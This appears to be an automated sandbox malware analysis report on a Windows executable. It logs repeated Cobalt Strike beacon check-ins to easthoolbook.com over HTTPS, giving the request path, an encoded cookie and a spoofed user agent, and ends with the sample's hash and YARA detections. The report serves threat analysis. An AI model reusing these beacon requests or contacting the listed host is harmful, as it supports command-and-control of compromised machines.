                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          23 | 192.168.2.6 | 49731 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:11 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:12 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:30 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:12 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          24 | 192.168.2.6 | 49732 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:14 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:15 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:33 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:15 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          25 | 192.168.2.6 | 49733 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:17 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:18 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:36 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:18 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          26 | 192.168.2.6 | 49735 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:20 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:21 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:39 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:21 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          27 | 192.168.2.6 | 49736 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:23 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:24 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:42 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:24 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          28 | 192.168.2.6 | 49737 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:26 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:27 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:45 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:27 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          29 | 192.168.2.6 | 49738 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:29 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:30 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:48 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:30 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          30 | 192.168.2.6 | 49739 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:32 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
                                                                          2024-04-19 13:32:33 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:51 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
                                                                          2024-04-19 13:32:33 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          31 | 192.168.2.6 | 49740 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-04-19 13:32:35 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:36 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:54 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:36 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49741 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:40 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:40 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:29:59 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:40 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49742 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:43 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:43 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:02 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:43 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 49743 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:46 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:46 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:05 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:46 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 49744 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:49 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:49 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:08 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:49 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 49745 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:52 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:52 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:11 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:52 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 49746 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:56 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:32:57 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:15 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:32:57 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 49747 | 89.150.57.46 | 443 | 6516 | C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 13:32:59 UTC | 517 | OUT | GET /sign.mpeg?dare=true HTTP/1.1
                                                                          Host: easthoolbook.com
                                                                          Accept: application/xml
                                                                          Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
                                                                          User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
                                                                          Connection: Close
                                                                          Cache-Control: no-cache
2024-04-19 13:33:00 UTC | 141 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 19 Apr 2024 13:30:18 GMT
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Server: cloudflare
                                                                          Content-Length: 600
2024-04-19 13:33:00 UTC | 600 | IN
                                                                          Data Ascii: <!DOCTYPE html>...[if IE 7]><html class='ie ie7' lang='en-US'><![endif]-->...[if IE 8]><html class='ie ie8' lang='en-US'><![endif]-->...[if !(IE 7) | !(IE 8) ]>...><html lang='en-US'>...<![endif]--> <head> <meta charset='UTF-8' /> <


Target ID: 0
Start time: 15:30:56
Start date: 19/04/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe"
Imagebase: 0x140000000
File size: 3'636'736 bytes
MD5 hash: C720C50306558112B389EF44CFF494F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
